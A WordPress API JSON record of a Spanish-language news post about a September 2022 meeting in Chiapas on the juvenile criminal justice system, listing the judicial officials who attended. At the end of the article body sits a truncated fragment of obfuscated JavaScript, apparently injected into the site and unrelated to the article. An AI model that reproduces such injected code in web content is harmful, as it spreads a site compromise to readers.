{"id":5170,"date":"2022-09-19T02:37:43","date_gmt":"2022-09-19T02:37:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5170"},"modified":"2022-09-19T02:37:44","modified_gmt":"2022-09-19T02:37:44","slug":"fortalece-poder-judicial-coordinacion-con-instituciones-operadoras-del-sistema-de-justicia-para-adolescentes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5170","title":{"rendered":"Fortalece Poder Judicial coordinaci\u00f3n con instituciones operadoras del Sistema de Justicia para Adolescentes."},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220918-WA0012.jpg\" alt=\"\" class=\"wp-image-5171\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220918-WA0012.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220918-WA0012-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220918-WA0012-768x510.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220918-WA0012-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>18 de Septiembre del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- Atendiendo a las necesidades de que exista certeza jur\u00eddica, en Materia del Sistema Penal de Justicia para Adolescentes, el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, convoc\u00f3 a los operadores especialistas en esta Materia, para llevar a cabo el Conversatorio del Sistema Integral de Justicia Penal para Adolescentes en el Estado de Chiapas.<\/p>\n\n\n\n<p>En esta reuni\u00f3n, se abordaron diversos temas que son relevantes para la el fortalecimiento de la especializaci\u00f3n de quienes aplican este modelo de Justicia Juvenil, con la finalidad de unificar criterios, compartir experiencias y razonamientos que permitan brindar su correcta aplicaci\u00f3n.<\/p>\n\n\n\n<p>El mensaje de bienvenida estuvo a cargo de la jueza del Juzgado de Control, Juicio Oral y Ejecuci\u00f3n, Especializado en Justicia Penal para Adolescentes, Jaqueline \u00c1ngel Juan en representaci\u00f3n de la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores.<\/p>\n\n\n\n<p>En su misiva, hizo extensivo el saludo del magistrado presidente Ramos P\u00e9rez a todas y todos los presentes y coment\u00f3 que en el Poder Judicial se asume la responsabilidad que las disposiciones legales generales establecen, as\u00ed como de dar cumplimiento a las leyes generales. Es por ello que resultan necesarios, la coordinaci\u00f3n de muchos esfuerzos y voluntades de diferentes instancias, dependencias y poderes.<\/p>\n\n\n\n<p>Estuvieron presentes en este conversatorio, la jueza interina de Primera Instancia del Juzgado de Control, Juicio Oral y Ejecuci\u00f3n Especializado en Justicia Penal para Adolescentes, Ang\u00e9lica Pamela Cort\u00e9s Dom\u00ednguez; la magistrada presidenta del Tribunal de Alzada Especializado en Justicia Penal de Adolescentes, Mirna Camacho Pedrero, la magistrada de la Ponencia &#8220;A&#8221;, del Tribunal de Alzada Especializada en Justicia para Adolescentes, Mar\u00eda Elena Ramos Gordillo; el secretario general de Acuerdos en funciones de magistrado por Ministerio de Ley del Tribunal de Alzada Especializado en Justicia Penal de Adolescentes, Francisco Mijangos Nucamendi.<\/p>\n\n\n\n<p>Asimismo, asistieron en representaci\u00f3n del director del Instituto de la Defensor\u00eda P\u00fablica del Poder Judicial del Estado de Chiapas, Jorge Alberto Selvas Culebro, Neftal\u00ed Nucamendi Ru\u00edz y el fiscal de Adolescentes de la Fiscal\u00eda General del Estado, Jos\u00e9 Eduardo Morales Montes.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>18 de Septiembre del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- Atendiendo a las necesidades de que exista certeza jur\u00eddica, en Materia del Sistema Penal de Justicia para Adolescentes, el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5171,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5170","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5170"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5170\/revisions"}],"predecessor-version":[{"id":5172,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5170\/revisions\/5172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5171"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}